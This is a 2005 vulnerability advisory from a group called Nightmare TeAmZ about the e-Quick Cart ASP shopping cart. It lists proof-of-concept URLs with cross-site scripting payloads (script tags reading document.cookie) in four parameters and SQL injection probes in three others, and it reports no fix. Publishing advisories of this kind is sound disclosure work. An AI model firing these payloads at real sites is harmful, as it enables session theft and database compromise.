e-Quick Cart is susceptible to multiple cross site scripting and SQL injection flaws. Exploitation details provided.
c0917d9be89c6bc5d4582e3cd2501515dc90fef1c4bbd7dc0cd3d650bec70897
------------------------------------------------------
Nightmare TeAmZ Advisory 016
------------------------------------------------------
Date - 11/2005
e-Quick Cart Sql & Xss
AFFECTED PRODUCTS
=================
e-Quick Cart
https://www.cdmweb.com
Xss Poof:
========
www.[host].com/[path]/shopgift.asp?strgifttoname="><script>alert(document.cookie);</script>
www.[host].com/[path]/shopmaillist.asp?strfirstname="><script>alert(document.cookie);</script>
www.[host].com/[path]/shopprojectlogin.asp?strpid="><script>alert(document.cookie);</script>
www.[host].com/[path]/shoptellafriend.asp?Custname="><script>alert(document.cookie);</script>
Sql Poof:
========
www.[host].com/[path]/shopaddtocart.asp?quantity=1&Order=Order&productid='
www.[host].com/[path]/shopprojectlogin.asp?strpid=1&strpemail='
www.[host].com/[path]/shoptellafriend.asp??id='
Solution:
=========
No Solution At This Time
Credits
=======
This vulnerability was discovered and researched by
BiPi_HaCk of Nightmare TeAmZ
We're: BiPi_HaCk - r3d_4Ss4ult3r - Sub_Z3r0
Site: https://www.NightmareSecurity.net <--IT Security Forum
_________________________________________________________________
Comunica in tempo reale https://messenger.msn.com/beta